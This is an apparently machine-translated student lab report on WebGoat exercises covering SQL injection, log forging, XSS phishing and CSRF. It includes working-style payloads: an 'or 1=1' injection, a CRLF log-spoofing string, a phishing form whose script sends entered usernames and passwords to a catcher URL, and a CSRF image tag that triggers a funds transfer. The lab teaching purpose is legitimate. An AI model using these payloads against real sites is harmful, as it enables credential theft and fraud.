2018-2019-2 20162329 "Network Warfare Technology" Exp9: Web Security Essentials

Others 2019-05-26 18:42:01 views: null

table of Contents

Exp9: Web Security Essentials

First, the basics

1.SQL injection attacks

  • Fundamental:
    • That is, when criminals exploit loopholes in the programming, through a form to enter special characters and malicious SQL code, so that the background to perform SQL queries, resulting in unpredictable or irreversible attack on the database or destroyed.
  • Defensive approach:
    • Avoid unnecessary form submission page.
    • To form input controls, such as: limiting character type, character length limit
    • Use the licensing mechanism in the database layer, database operations limit behavior.

2.XSS cross-site scripting attacks

  • Fundamental:
    • An attacker who exploited the vulnerability site, by injecting malicious script code, or otherwise transmit or store to the server by using the user's browser to trust, when the normal user to access the server would be scripting attacks, such as access to the user's cookie or other information.
  • Defensive approach:
    • Try not to save your own user entered in the browser, the user name and password
    • Web site developers should be some filtering of the data uploaded by the user
    • Controlling the input form

3.CSRF CSRF

  • Fundamental:
    • When a user visits a website input A user name and password is verified at the site A generates and returns a Cookie information, visit the website A successful case, normally send a request to the site A. Before not exit site A, site B when accessing another malicious, Site B may return some attack code and request access to website A; thus, at the request of the site B, to the requesting site A. A Web site but do not know the request is malicious, so it will execute the malicious code.
  • Defensive approach:
    • Token authentication request
    • Verify Referer
    • Adding random verification
    • Set the cookie domain

Two, SQL injection

1. command injection

  • Attack process: incoming malicious command data in a form submission, to execute on the server side.
  • experiment procedure:
    • Right-click on the page, selectinspect Element
    • Press the keyboard f12View page source
    • Click the viewbutton to execute the code results are as follows:

2. Digital injection

  • Attack process: input type digital generation never really in form input so that the injected SQL statements must be executed.
  • experiment procedure:
    • See page source code experimentally, to value='101'modify, add or 1=1configured never really formula as:
    • Click the button to perform the following results:

3. Log deceive

  • Attack process: criminals by injecting script, modify the log file via a script.
  • experiment procedure:
    • Input in the form provided by the experimental environment 2329%0d%0aLogin Succeeded for username: 162329where %0dand %0acarriage return and line feed.
    • The results as shown below:

Three, XSS attacks

1. XSS phishing attacks

  • Attack process: through form input script, modify the page HTML, generate phishing sites to obtain information entered by the user when the user enters.
  • experiment procedure:
    • Enter the script code in a test environment, form, structure fishing interface.
    • Interface code as follows:
    <form>
<br><br><HR><H3>This feature requires account login:</H3 ><br><br> 
Enter Username:<br><input type="text" id="user" name="user"><br> 
Enter Password:<br><input type="password" name = "pass"><br> 
</form><br><br><HR>
<script>
function hack()
{ 
 alert("Had this been a real attack... Your credentials were just stolen." User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); 
 XSSImage=new Image; 
 XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ";
}
</script>
  • The above code is entered into the search box, click on the search as shown:
  • When the user clicks submit attacker interface will appear as shown below:

Four, CSRF attacks

1. CSRF

  • Attack process:
    • A malicious user sends a URL to lure another user clicks to trigger CSRF attacks. To make it easier for users deceived, we can hide the URL in the form of pictures.
  • experiment procedure:
    • View menu parameter in src and value for the 261 and 900
    • In the message box, enter the <img src="http://localhost:8080/WebGoat/attack? Screen=261&menu=900&transferFunds=2329"/>click submit results were as follows:
    • When the user clicks Message field picture will steal user 2329 yuan

Fifth, experiment and experience summary

Through this experiment really feel what is SQL injection, XSS attacks and CRSF attacks, to understand the process which in the experiment, but also summed up its own defense against these attacks, feel benefit.

Guess you like

Origin www.cnblogs.com/Zhangxusheng/p/10926028.html
Recommended
Face Wall Intelligence releases the Eurux-8x22B open source large model - it can be called the "science champion"
Kaiyuan Daily | Google supports Hongmeng to take over; open source Rabbit R1; Android phones supported by Docker; Microsoft’s anxiety and ambition; Haier Electric shuts down the open platform
Ranking
Jianzhi offer interview questions 68-II. The nearest common ancestor of a binary tree (recursive)
jQuery Mobile development 1-UI components
Summary of Kotlin function knowledge
[ZZ] The Naked Truth About Anisotropic Filtering
Diagnosis: record a recovery of abnormal CRASH storage caused the database to be unable to be opened normally
Redis introduction and Linux installation Redis
Experiment 2 Introduction to switches
glances open source command-line system monitoring tools introduced
Use of selector
vue3 handwriting a carousel picture
Daily
More
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)

Code World

© 2018 codetd.com